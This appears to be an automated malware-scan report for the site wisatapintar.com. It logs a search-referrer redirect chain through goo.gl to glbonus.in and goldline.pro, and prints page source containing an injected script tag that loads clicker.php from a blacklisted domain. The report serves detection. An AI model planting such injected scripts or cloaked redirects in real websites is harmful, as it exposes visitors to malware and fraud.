Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://wisatapintar.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: wisatapintar.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Apr 2014 21:19:09 GMT Location: http://goo.gl/qSaO2y Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://goo.gl/qSaO2y (imitation of visitor from search engine) GET /qSaO2y HTTP/1.1 Host: goo.gl Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Wed, 09 Apr 2014 21:19:11 GMT Pragma: no-cache Location: http://glbonus.in/?partner=Pashkela Server: GSE Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | malicious |
URL: http://glbonus.in/?partner=Pashkela (imitation of visitor from search engine) GET /?partner=Pashkela HTTP/1.1 Host: glbonus.in Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Found Connection: close Date: Wed, 09 Apr 2014 21:12:56 GMT Location: http://goldline.pro?partner=Pashkela Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 220 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://wisatapintar.com/ | 200 OK Content-Length: 36106 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ftp.seizeter.com ...[6798 bytes skipped]... ]> <body class="home blog ie6"> <![endif]--> <!--[if IE 7 ]> <body class="home blog ie7"> <![endif]--> <!--[if IE 8 ]> <body class="home blog ie8"> <![endif]--> <!--[if IE 9 ]> <body class="home blog ie9"> <![endif<]--> <!--[if (gt IE 9)|!(IE)]><!--> <body class="home blog"> <script type="text/javascript" src="http://ftp.seizeter.com/clicker.php?id=3193654"></script> <!--<![endif]--> <div id="body-wrapper" class="clearfix"> <header id="header-main" role="banner"> <!-- begin header --> <ul id="headerbanner" class="clearfix"> <li id="header_logo" class="mainl"> <div id="site-logo" class="siteheader"><h1>Wisata Pintar</h1><a href="http://wisatapintar.com/"><img src="http:// ...[34112 bytes skipped]... | ||
https://apis.google.com/js/plusone.js?ver=3.8.2 | 200 OK Content-Length: 11645 Content-Type: application/javascript | clean |
http://wisatapintar.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://wisatapintar.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://wisatapintar.com/wp-content/plugins//social-linkz/core/load-scripts.php?c=0&load=c2903ef533eccb5f8df71266aa2b79ce&ver=20140409 | 200 OK Content-Length: 716 Content-Type: application/x-javascript | clean |
http://ftp.seizeter.com/clicker.php?id=3193654 | 500 Can't connect to ftp.seizeter.com:80 (Ð Ñоединении оÑказано) Content-Length: 210 Content-Type: text/plain | clean |
http://ftp.seizeter.com/test404page.js | 500 Can't connect to ftp.seizeter.com:80 (Ð Ñоединении оÑказано) Content-Length: 210 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wisatapintar.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wisatapintar.com/
Result: wisatapintar.com is not infected or malware details are not published yet.
Result: wisatapintar.com is not infected or malware details are not published yet.